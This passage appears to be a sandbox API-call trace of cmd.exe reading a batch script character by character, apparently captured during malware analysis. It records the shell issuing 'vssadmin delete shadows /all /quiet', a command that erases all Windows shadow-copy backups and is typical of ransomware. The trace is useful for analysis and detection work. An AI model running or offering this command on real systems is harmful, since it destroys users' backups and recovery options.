lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.141] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0033.141] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.141] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.141] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.141] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0033.141] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.141] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.141] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.141] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0033.141] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.141] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.141] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.141] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0033.141] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.141] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.141] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.141] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0033.141] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.141] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.141] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.141] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0033.141] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.141] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.142] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0033.142] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.142] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.142] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0033.142] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.142] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.142] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0033.142] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.142] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.142] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0033.142] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.142] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.142] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0033.142] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.142] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.142] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0033.142] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.142] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.142] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0033.142] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.142] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.142] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.143] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.143] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.143] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.143] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.143] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.143] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.143] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.143] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0033.143] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.143] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0033.144] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.144] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0033.144] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.144] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0033.144] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.144] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0033.144] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.144] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0033.144] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.144] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0033.144] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.144] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0033.144] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.144] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.144] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.144] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0033.145] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.145] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.145] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.145] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0033.145] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.145] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.145] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.145] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0033.145] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.145] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.145] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.145] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0033.145] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.145] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.145] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.145] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0033.145] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.145] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.145] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.145] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0033.145] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.145] GetFileType (hFile=0xe8) returned 0x3 [0033.145] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.145] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.145] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.145] GetFileType (hFile=0xf4) returned 0x3 [0033.145] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.145] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0033.145] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x28f558, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f558*=0x24, lpOverlapped=0x0) returned 1 [0033.145] GetProcessHeap () returned 0x2e0000 [0033.146] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2ff630 [0033.146] GetProcessHeap () returned 0x2e0000 [0033.146] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ff630 | out: hHeap=0x2e0000) returned 1 [0033.146] GetProcessHeap () returned 0x2e0000 [0033.146] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97e0 [0033.146] GetProcessHeap () returned 0x2e0000 [0033.146] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x22) returned 0x2f4610 [0033.146] GetProcessHeap () returned 0x2e0000 [0033.146] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x48) returned 0x2faa90 [0033.147] GetConsoleOutputCP () returned 0x4e3 [0033.147] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a8abfe0 | out: lpCPInfo=0x4a8abfe0) returned 1 [0033.147] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0033.147] GetConsoleTitleW (in: lpConsoleTitle=0x28f510, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.147] GetProcessHeap () returned 0x2e0000 [0033.147] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2f9910 [0033.147] GetProcessHeap () returned 0x2e0000 [0033.147] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x5a) returned 0x2f9b30 [0033.147] GetProcessHeap () returned 0x2e0000 [0033.147] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2f9090 [0033.147] SetErrorMode (uMode=0x0) returned 0x0 [0033.147] SetErrorMode (uMode=0x1) returned 0x0 [0033.147] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f90a0, lpFilePart=0x28eda0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28eda0*="Desktop") returned 0x25 [0033.147] SetErrorMode (uMode=0x0) returned 0x1 [0033.147] GetProcessHeap () returned 0x2e0000 [0033.147] 